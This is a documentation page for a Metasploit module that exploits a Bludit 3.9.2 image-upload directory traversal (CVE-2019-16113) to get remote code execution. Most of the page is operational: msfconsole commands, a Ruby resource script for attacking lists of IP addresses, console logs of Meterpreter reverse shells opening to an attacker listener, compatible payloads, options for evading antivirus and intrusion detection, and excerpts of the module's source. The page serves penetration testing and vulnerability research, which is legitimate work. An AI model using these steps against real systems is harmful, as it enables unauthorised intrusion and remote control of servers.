Bludit Directory Traversal Image File Upload Vulnerability - Metasploit


This page contains detailed information about how to use the exploit/linux/http/bludit_upload_images_exec metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Bludit Directory Traversal Image File Upload Vulnerability
Module: exploit/linux/http/bludit_upload_images_exec
Source code: modules/exploits/linux/http/bludit_upload_images_exec.rb
Disclosure date: 2019-09-07
Last modification time: 2019-11-11 14:47:56 +0000
Supported architecture(s): php
Supported platform(s): PHP
Target service / protocol: http, https
Target network port(s): 80, 443, 3000, 8000, 8008, 8080, 8443, 8880, 8888
List of CVEs: CVE-2019-16113

This module exploits a vulnerability in Bludit. A remote user could abuse the uuid parameter in the image upload feature in order to save a malicious payload anywhere onto the server, and then use a custom .htaccess file to bypass the file extension check to finally get remote code execution.

Module Ranking and Traits


Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-safe: Module should not crash the service.

Side Effects:

  • ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).

Basic Usage


Using bludit_upload_images_exec against a single host

Normally, you can use exploit/linux/http/bludit_upload_images_exec this way:

msf > use exploit/linux/http/bludit_upload_images_exec
msf exploit(bludit_upload_images_exec) > show targets
    ... a list of targets ...
msf exploit(bludit_upload_images_exec) > set TARGET target-id
msf exploit(bludit_upload_images_exec) > show options
    ... show and set options ...
msf exploit(bludit_upload_images_exec) > exploit

Using bludit_upload_images_exec against multiple hosts

But it looks like this is a remote exploit module, which means you can also engage multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your bludit_upload_images_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |ip|
  print_status("Trying against #{ip}")
  run_single("use exploit/linux/http/bludit_upload_images_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options.
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

And finally, you should see that the exploit is trying against those hosts similar to the following MS08-067 example:

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

  • BLUDITUSER: The username for Bludit

  • BLUDITPASS: The password for Bludit

Knowledge Base


Bludit Directory Traversal Image File Upload Vulnerability


Description


This module exploits a vulnerability in Bludit: A simple, fast, "secure", flat-file CMS. A vulnerability was found by christasa in the image uploading feature. A remote user could abuse the uuid parameter in the upload feature in order to save a malicious payload anywhere onto the server, and then use a custom .htaccess file to bypass the file extension check, and finally get remote code execution.

Setup


  1. Set up a Ubuntu box with Apache, PHP, and MySQL.
  2. Download: https://www.bludit.com/releases/bludit-3-9-2.zip
  3. Follow the installation guide here. Make sure your Apache server sets AllowOverride All in /etc/apache2/apache2.conf.

Scenarios


msf5 exploit(linux/http/bludit_upload_images_exec) > check
[*] 172.16.135.162:80 - The service is running, but could not be validated.
msf5 exploit(linux/http/bludit_upload_images_exec) > run

[*] Started reverse TCP handler on 172.16.135.1:4444 
[+] Logged in as: admin
[*] Retrieving UUID...
[*] Uploading qGkVsmahdK.png...
[*] Uploading .htaccess...
[*] Executing qGkVsmahdK.png...
[*] Sending stage (38288 bytes) to 172.16.135.162
[*] Meterpreter session 1 opened (172.16.135.1:4444 -> 172.16.135.162:47086) at 2019-11-05 08:54:34 -0600
[+] Deleted .htaccess

Go back to menu.

Msfconsole Usage


Here is how the linux/http/bludit_upload_images_exec exploit module looks in the msfconsole:

msf6 > use exploit/linux/http/bludit_upload_images_exec

[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(linux/http/bludit_upload_images_exec) > show info

       Name: Bludit Directory Traversal Image File Upload Vulnerability
     Module: exploit/linux/http/bludit_upload_images_exec
   Platform: PHP
       Arch: php
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-09-07

Provided by:
  christasa
  sinn3r <[email protected]>

Module side effects:
 ioc-in-logs

Module stability:
 crash-safe

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Bludit v3.9.2

Check supported:
  Yes

Basic options:
  Name        Current Setting  Required  Description
  ----        ---------------  --------  -----------
  BLUDITPASS                   yes       The password for Bludit
  BLUDITUSER                   yes       The username for Bludit
  Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT       80               yes       The target port (TCP)
  SSL         false            no        Negotiate SSL/TLS for outgoing connections
  TARGETURI   /                yes       The base path for Bludit
  VHOST                        no        HTTP server virtual host

Payload information:

Description:
  This module exploits a vulnerability in Bludit. A remote user could 
  abuse the uuid parameter in the image upload feature in order to 
  save a malicious payload anywhere onto the server, and then use a 
  custom .htaccess file to bypass the file extension check to finally 
  get remote code execution.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-16113
  https://github.com/bludit/bludit/issues/1081
  https://github.com/bludit/bludit/commit/a9640ff6b5f2c0fa770ad7758daf24fec6fbf3f5#diff-6f5ea518e6fc98fb4c16830bbf9f5dac

Module Options


This is a complete list of options available in the linux/http/bludit_upload_images_exec exploit:

msf6 exploit(linux/http/bludit_upload_images_exec) > show options

Module options (exploit/linux/http/bludit_upload_images_exec):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   BLUDITPASS                   yes       The password for Bludit
   BLUDITUSER                   yes       The username for Bludit
   Proxies                      no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT       80               yes       The target port (TCP)
   SSL         false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI   /                yes       The base path for Bludit
   VHOST                        no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.204.3    yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Bludit v3.9.2

Advanced Options


Here is a complete list of advanced options supported by the linux/http/bludit_upload_images_exec exploit:

msf6 exploit(linux/http/bludit_upload_images_exec) > show advanced

Module advanced options (exploit/linux/http/bludit_upload_images_exec):

   Name                    Current Setting                                     Required  Description
   ----                    ---------------                                     --------  -----------
   ContextInformationFile                                                      no        The information file that contains context information
   DOMAIN                  WORKSTATION                                         yes       The domain to use for Windows authentication
   DigestAuthIIS           true                                                no        Conform to IIS, should work for most servers. Only set to false for non-IIS servers
   DisablePayloadHandler   false                                               no        Disable the handler code for the selected payload
   EXE::Custom                                                                 no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                                               no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                                               no        Use the default template in case the specified one is missing
   EXE::Inject             false                                               no        Set to preserve the original EXE function
   EXE::OldMethod          false                                               no        Set to use the substitution EXE generation method.
   EXE::Path                                                                   no        The directory in which to look for the executable template
   EXE::Template                                                               no        The executable template file name.
   EnableContextEncoding   false                                               no        Use transient context when encoding payloads
   FileDropperDelay                                                            no        Delay in seconds before attempting cleanup
   FingerprintCheck        true                                                no        Conduct a pre-exploit fingerprint verification
   HttpClientTimeout                                                           no        HTTP connection and receive timeout
   HttpPassword                                                                no        The HTTP password to specify for authentication
   HttpRawHeaders                                                              no        Path to ERB-templatized raw headers to append to existing headers
   HttpTrace               false                                               no        Show the raw HTTP requests and responses
   HttpTraceColors         red/blu                                             no        HTTP request and response colors for HttpTrace (unset to disable)
   HttpTraceHeadersOnly    false                                               no        Show HTTP headers only in HttpTrace
   HttpUsername                                                                no        The HTTP username to specify for authentication
   MSI::Custom                                                                 no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                                               no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                                                   no        The directory in which to look for the msi template
   MSI::Template                                                               no        The msi template file name
   MSI::UAC                false                                               no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   SSLVersion              Auto                                                yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   UserAgent               Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)  no        The User-Agent header to use for all requests
   VERBOSE                 false                                               no        Enable detailed status messages
   WORKSPACE                                                                   no        Specify the workspace for this module
   WfsDelay                2                                                   no        Additional delay in seconds to wait for a session

Payload advanced options (php/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/http/bludit_upload_images_exec module can exploit:

msf6 exploit(linux/http/bludit_upload_images_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Bludit v3.9.2

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/http/bludit_upload_images_exec exploit:

msf6 exploit(linux/http/bludit_upload_images_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/generic/custom                                       normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/multi/meterpreter/reverse_http                       normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTP Stager (Multiple Architectures)
   4   payload/multi/meterpreter/reverse_https                      normal  No     Architecture-Independent Meterpreter Stage, Reverse HTTPS Stager (Multiple Architectures)
   5   payload/php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   6   payload/php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   7   payload/php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   8   payload/php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   9   payload/php/download_exec                                    normal  No     PHP Executable Download and Execute
   10  payload/php/exec                                             normal  No     PHP Execute Command
   11  payload/php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   12  payload/php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   13  payload/php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   14  payload/php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   15  payload/php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  payload/php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   17  payload/php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   18  payload/php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   19  payload/php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

Evasion Options


Here is the full list of possible evasion options supported by the linux/http/bludit_upload_images_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/http/bludit_upload_images_exec) > show evasion

Module evasion options:

   Name                          Current Setting  Required  Description
   ----                          ---------------  --------  -----------
   HTTP::header_folding          false            no        Enable folding of HTTP headers
   HTTP::method_random_case      false            no        Use random casing for the HTTP method
   HTTP::method_random_invalid   false            no        Use a random invalid, HTTP method for request
   HTTP::method_random_valid     false            no        Use a random, but valid, HTTP method for request
   HTTP::pad_fake_headers        false            no        Insert random, fake headers into the HTTP request
   HTTP::pad_fake_headers_count  0                no        How many fake headers to insert into the HTTP request
   HTTP::pad_get_params          false            no        Insert random, fake query string variables into the request
   HTTP::pad_get_params_count    16               no        How many fake query string variables to insert into the request
   HTTP::pad_method_uri_count    1                no        How many whitespace characters to use between the method and uri
   HTTP::pad_method_uri_type     space            no        What type of whitespace to use between the method and uri (Accepted: space, tab, apache)
   HTTP::pad_post_params         false            no        Insert random, fake post variables into the request
   HTTP::pad_post_params_count   16               no        How many fake post variables to insert into the request
   HTTP::pad_uri_version_count   1                no        How many whitespace characters to use between the uri and version
   HTTP::pad_uri_version_type    space            no        What type of whitespace to use between the uri and version (Accepted: space, tab, apache)
   HTTP::uri_dir_fake_relative   false            no        Insert fake relative directories into the uri
   HTTP::uri_dir_self_reference  false            no        Insert self-referential directories into the uri
   HTTP::uri_encode_mode         hex-normal       no        Enable URI encoding (Accepted: none, hex-normal, hex-noslashes, hex-random, hex-all, u-normal, u-all, u-random)
   HTTP::uri_fake_end            false            no        Add a fake end of URI (eg: /%20HTTP/1.0/../../)
   HTTP::uri_fake_params_start   false            no        Add a fake start of params to the URI (eg: /%3fa=b/../)
   HTTP::uri_full_url            false            no        Use the full URL for all HTTP requests
   HTTP::uri_use_backslashes     false            no        Use back slashes instead of forward slashes in the uri
   HTTP::version_random_invalid  false            no        Use a random invalid, HTTP version for request
   HTTP::version_random_valid    false            no        Use a random, but valid, HTTP version for request

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

Connection timed out


Here is a relevant code snippet related to the "Connection timed out" error message:

85:	      'method' => 'GET',
86:	      'uri'    => normalize_uri(target_uri.path, 'index.php')
87:	    })
88:	
89:	    unless res
90:	      vprint_error('Connection timed out')
91:	      return CheckCode::Unknown
92:	    end
93:	
94:	    html = res.get_html_document
95:	    generator_tag = html.at('meta[@name="generator"]')

No generator metadata tag found in HTML


Here is a relevant code snippet related to the "No generator metadata tag found in HTML" error message:

92:	    end
93:	
94:	    html = res.get_html_document
95:	    generator_tag = html.at('meta[@name="generator"]')
96:	    unless generator_tag
97:	      vprint_error('No generator metadata tag found in HTML')
98:	      return CheckCode::Safe
99:	    end
100:	
101:	    content_attr = generator_tag.attributes['content']
102:	    unless content_attr

No content attribute found in metadata tag


Here is a relevant code snippet related to the "No content attribute found in metadata tag" error message:

98:	      return CheckCode::Safe
99:	    end
100:	
101:	    content_attr = generator_tag.attributes['content']
102:	    unless content_attr
103:	      vprint_error("No content attribute found in metadata tag")
104:	      return CheckCode::Safe
105:	    end
106:	
107:	    if content_attr.value == 'Bludit'
108:	      return CheckCode::Detected

Connection timed out


Here is a relevant code snippet related to the "Connection timed out" error message:

118:	      'uri'    => normalize_uri(target_uri.path, 'admin', 'new-content', 'index.php'),
119:	      'cookie' => "BLUDIT-KEY=#{login_badge.bludit_key};"
120:	    })
121:	
122:	    unless res
123:	      fail_with(Failure::Unknown, 'Connection timed out')
124:	    end
125:	
126:	    html = res.get_html_document
127:	    uuid_element = html.at('input[@name="uuid"]')
128:	    unless uuid_element

No UUID found in admin/new-content/


Here is a relevant code snippet related to the "No UUID found in admin/new-content/" error message:

124:	    end
125:	
126:	    html = res.get_html_document
127:	    uuid_element = html.at('input[@name="uuid"]')
128:	    unless uuid_element
129:	      fail_with(Failure::Unknown, 'No UUID found in admin/new-content/')
130:	    end
131:	
132:	    uuid_val = uuid_element.attributes['value']
133:	    unless uuid_val && uuid_val.respond_to?(:value)
134:	      fail_with(Failure::Unknown, 'No UUID value')

No UUID value


Here is a relevant code snippet related to the "No UUID value" error message:

129:	      fail_with(Failure::Unknown, 'No UUID found in admin/new-content/')
130:	    end
131:	
132:	    uuid_val = uuid_element.attributes['value']
133:	    unless uuid_val && uuid_val.respond_to?(:value)
134:	      fail_with(Failure::Unknown, 'No UUID value')
135:	    end
136:	
137:	    uuid_val.value
138:	  end
139:	

Connection timed out


Here is a relevant code snippet related to the "Connection timed out" error message:

153:	      'headers' => {'X-Requested-With' => 'XMLHttpRequest'},
154:	      'data'    => data.to_s
155:	    })
156:	
157:	    unless res
158:	      fail_with(Failure::Unknown, 'Connection timed out')
159:	    end
160:	  end
161:	
162:	  def upload_php_payload_and_exec(login_badge)
163:	    # From: /var/www/html/bludit/bl-content/uploads/pages/5821e70ef1a8309cb835ccc9cec0fb35/

No tokenCSRF found


Here is a relevant code snippet related to the "No tokenCSRF found" error message:

193:	    bludit_key = cookies.scan(/BLUDIT\-KEY=(.+);/i).flatten.first || ''
194:	
195:	    html = res.get_html_document
196:	    csrf_element = html.at('input[@name="tokenCSRF"]')
197:	    unless csrf_element
198:	      fail_with(Failure::Unknown, 'No tokenCSRF found')
199:	    end
200:	
201:	    csrf_val = csrf_element.attributes['value']
202:	    unless csrf_val && csrf_val.respond_to?(:value)
203:	      fail_with(Failure::Unknown, 'No tokenCSRF value')

No tokenCSRF value


Here is a relevant code snippet related to the "No tokenCSRF value" error message:

198:	      fail_with(Failure::Unknown, 'No tokenCSRF found')
199:	    end
200:	
201:	    csrf_val = csrf_element.attributes['value']
202:	    unless csrf_val && csrf_val.respond_to?(:value)
203:	      fail_with(Failure::Unknown, 'No tokenCSRF value')
204:	    end
205:	
206:	    LoginBadge.new(datastore['BLUDITUSER'], datastore['BLUDITPASS'], csrf_val.value, bludit_key)
207:	  end
208:	

Connection timed out


Here is a relevant code snippet related to the "Connection timed out" error message:

211:	      'method' => 'GET',
212:	      'uri'    => normalize_uri(target_uri.path, 'admin', 'index.php')
213:	    })
214:	
215:	    unless res
216:	      fail_with(Failure::Unknown, 'Connection timed out')
217:	    end
218:	
219:	    login_badge = get_login_badge(res)
220:	    res = send_request_cgi({
221:	      'method'    => 'POST',

Connection timed out


Here is a relevant code snippet related to the "Connection timed out" error message:

228:	          'password'  => login_badge.password
229:	        }
230:	    })
231:	
232:	    unless res
233:	      fail_with(Failure::Unknown, 'Connection timed out')
234:	    end
235:	
236:	    # A new csrf value is generated, need to update this for the upload
237:	    if res.headers['Location'].to_s.include?('/admin/dashboard')
238:	      store_valid_credential(user: login_badge.username, private: login_badge.password)

Connection timed out


Here is a relevant code snippet related to the "Connection timed out" error message:

241:	        'uri'    => normalize_uri(target_uri.path, 'admin', 'dashboard', 'index.php'),
242:	        'cookie' => "BLUDIT-KEY=#{login_badge.bludit_key};",
243:	      })
244:	
245:	      unless res
246:	        fail_with(Failure::Unknown, 'Connection timed out')
247:	      end
248:	
249:	      new_csrf = res.body.scan(/var tokenCSRF = "(.+)";/).flatten.first
250:	      login_badge.csrf_token = new_csrf if new_csrf
251:	      return login_badge

Authentication failed


Here is a relevant code snippet related to the "Authentication failed" error message:

249:	      new_csrf = res.body.scan(/var tokenCSRF = "(.+)";/).flatten.first
250:	      login_badge.csrf_token = new_csrf if new_csrf
251:	      return login_badge
252:	    end
253:	
254:	    fail_with(Failure::NoAccess, 'Authentication failed')
255:	  end
256:	
257:	  def exploit
258:	    login_badge = do_login
259:	    print_good("Logged in as: #{login_badge.username}")

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • christasa
  • sinn3r

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.